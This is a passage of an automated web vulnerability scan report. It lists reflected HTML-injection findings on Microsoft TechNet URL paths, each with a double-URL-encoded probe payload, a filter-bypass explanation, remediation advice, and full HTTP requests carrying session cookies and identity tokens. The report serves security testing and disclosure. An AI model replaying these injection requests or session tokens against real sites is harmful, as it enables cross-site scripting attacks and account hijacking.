17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727030.aspxff840"><a>8b8b766e8e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d8%2522%253e%253ca%253e73909da25c3 was submitted in the REST URL parameter 1. This input was echoed as a36d8"><a>73909da25c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa36d8%2522%253e%253ca%253e73909da25c3/library/bb727032.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:16 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa36d8"><a>73909da25c3/library/bb727032" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b4e%2522%253e%253ca%253e81d8c2f2d6 was submitted in the REST URL parameter 2. This input was echoed as 38b4e"><a>81d8c2f2d6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library38b4e%2522%253e%253ca%253e81d8c2f2d6/bb727032.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10198 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library38b4e"><a>81d8c2f2d6/bb727032" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80878%2522%253e%253ca%253e3c2f7f52469 was submitted in the REST URL parameter 3. This input was echoed as 80878"><a>3c2f7f52469 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727032.aspx80878%2522%253e%253ca%253e3c2f7f52469 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727032.aspx80878"><a>3c2f7f52469" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de844%2522%253e%253ca%253e2b4581b2944 was submitted in the REST URL parameter 1. This input was echoed as de844"><a>2b4581b2944 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usde844%2522%253e%253ca%253e2b4581b2944/library/bb727034.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:02 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usde844"><a>2b4581b2944/library/bb727034" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3256%2522%253e%253ca%253ed1e3e5457a5 was submitted in the REST URL parameter 2. This input was echoed as d3256"><a>d1e3e5457a5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd3256%2522%253e%253ca%253ed1e3e5457a5/bb727034.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:12 GMT
